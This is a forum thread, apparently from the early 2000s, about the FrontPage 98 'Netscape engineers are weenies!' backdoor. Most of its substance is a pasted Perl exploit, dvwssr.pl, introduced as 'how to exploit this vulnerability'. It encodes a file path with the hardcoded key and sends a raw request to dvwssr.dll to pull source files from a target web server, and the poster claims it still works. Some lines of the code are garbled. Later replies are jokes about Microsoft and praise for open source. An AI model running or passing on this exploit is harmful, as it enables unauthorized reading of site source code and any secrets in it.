FrontPage98 BackDoor

[ChakanTGM]

"Microsoft said its engineers included a secret back door including the phrase "Netscape engineers are weenies!" in Web site authoring software that could allow hackers to gain unauthorized access to potentially thousands of Web sites . . . "

http://news.com.com/2100-1001-239273.html?legacy=cnet

This, my friends, is why open source shall rule the day. Microsoft has been putting backdoors in thier software for ages. They just got caught this time.

Here's how to exploit this vulnerabiliy:

 

quote:
#!/usr/bin/perl
# dvwssr.pl by rain forest puppy (only tested on Linux, as usual)
#
# Usage: dvwssr.pl target_host /file/to/retrieve/source
#
use Socket;


$ip=$ARGV[0];
$file=$ARGV[1];


print "Encoding to: ".encodefilename($file)."\n";
$url="GET /_vti_bin/_vti_aut/dvwssr.dll?".encodefilename($file)." HTTP/1.0\n\n";
print sendraw($url);


sub encodefilename {
my $from=shift;
my $slide="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
#
#


my $key="Netscape engineers are weenies!";


#
#
my $kc=length($from);
my ($fv,$kv,$tmp,$to,$lett);
 @letts=split(//,$from);
 foreach $lett (@letts){
  $fv=index $slide, $lett;
  $fv=index $slide, (substr $slide,62-$fv,1) if($fv>=0);
  $kv=index $slide, substr $key, $kc, 1;
  if($kv>=0 && $fv>=0){
   $tmp= $kv - $fv;
   if($tmp <0){$tmp +=62;}
   $to.=substr $slide, $tmp,1; } else {
   $to.=$lett;}
  if(++$kc >= length($key)){ $kc=0;}
 }return $to;}


sub sendraw {
        my ($pstr)=@_;
        my $target;
        $target= inet_aton($ip) || die("inet_aton problems");
        socket(S,2,1,getprotobyname('tcp')||0) || die("Socket problems\n");
        if(connect(S,pack "SnA4x8",2,80,$target)){
                select(; $|=1;
                print $pstr; my @in=<S>;
                select(STDOUT); close(;
                return @in;
        } else { die("Can't connect...\n"); }}

 

[ChakanTGM]

By the way, I know the story is outdated by about three years. But it is still a good story, and the exploit still works.

[Calum]

it still works 3 years later? open source software cannot get better advertising than that.

[X123]

If someone has a site with front page extensions then they deserve to be hacked.

[Calum]

backdoor extensions (insert puerile snigger here)

[Pissed_Macman]

God, no wonder Microsoft programs suck. The designers are busy making easter eggs and back doors.

[Refalm]

quote:Microsoft Corperation: Netscape engineers are weenies!

At least they have the guts to release the source code of their program to anyone. When are you wuzzies going to do that?

[jtpenrod]

quote:God, no wonder Microsoft programs suck. The designers are busy making easter eggs and back doors.

And let's not forget being too damn lazy/careless/indifferent to validate data before it goes into buffers.   :rolleyes:  

Then, again, what can you expect when the vast majority of your coders are "perma-temps" with all the long hours and responsibilities of full-time career positions with none of the pay and benefits of same?    
_______________________________________
Live Free or Die: Linux

Their fundamental design flaws are completely concealed by their superficial design flaws.

[theangelofdeath69]

What, only one back door?